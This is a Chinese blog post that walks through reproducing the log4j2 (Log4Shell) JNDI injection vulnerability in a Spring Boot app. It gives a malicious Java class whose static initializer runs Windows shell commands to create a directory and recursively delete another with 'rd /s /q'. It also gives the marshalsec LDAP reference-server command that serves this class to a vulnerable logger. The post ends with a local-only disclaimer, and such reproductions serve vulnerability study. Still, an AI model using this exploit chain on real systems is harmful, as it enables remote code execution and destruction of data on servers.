侧边栏壁纸
博主头像
suke

ah?

  • 累计撰写 54 篇文章
  • 累计创建 38 个标签
  • 累计收到 103 条评论

目 录CONTENT

文章目录

手把手复现如何利用log4j2漏洞删除服务器的文件

suke
2021-12-15 / 0 评论 / 5 点赞 / 859 阅读 / 1,089 字 / 正在检测是否收录...
温馨提示:
本文最后更新于 2021-12-15,若内容或图片失效,请留言反馈。部分素材来自网络,若不小心影响到您的利益,请联系我们删除。

说明

  • springboot^2.6.1
  • jdk^1.8_211
  • log4j2^2.6.1

创建springboot的新工程

  • 版本选择最新版 即:2.6.1

引入log4j2的依赖

  • maven仓库截至2021/12/15最新版的log4j2的依赖如下

排除springboot最新版自自动的日志

创建漏洞执行文件程序以及生成对应编译文件

任意目录创建下面文件 不带包名


/**
 * @author 1215618342@qq.com
 */
public class TestLog4j2 {

   static {
        System.err.println("=========mkdir C:\\ele\\aa ===================");
        try {
            String cmds = "cmd /c mkdir C:\\ele\\aa";
            Runtime.getRuntime().exec(cmds);
        } catch ( Exception e ) {
            e.printStackTrace();
        }
        try {
            System.err.println("=========delete  C:\\ele\\suke ===================");
            Runtime run = Runtime.getRuntime();
            String cmd="cmd /c rd/s/q "+"C:\\ele\\suke";
            Process p = run.exec(cmd);
            p.waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

}

编译成class

用nginx或者其他工具映射对应class文件

这里我直接使用http-server

下载marshalsec工具

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8080/#TestLog4j2" 8888

参数说明

  • 双引号中的内容为上面漏洞执行脚本程序的编译文件地址和类名,http://127.0.0.1:8080为编译文件的可访问地址, TestLog4j2为类名
  • 8888 为当前marshalsec启动的ldap服务端口

springboot中创建测试访问接口

启动项目,访问接口

测试过程如下

  • c盘创建ele/suke目录
  • 按照前面顺序启动好之后,访问该测试接口,参数如图所示


最后

以上代码仅用于本地复现漏洞,请勿用于非法场景,出问题概不负责

5

评论区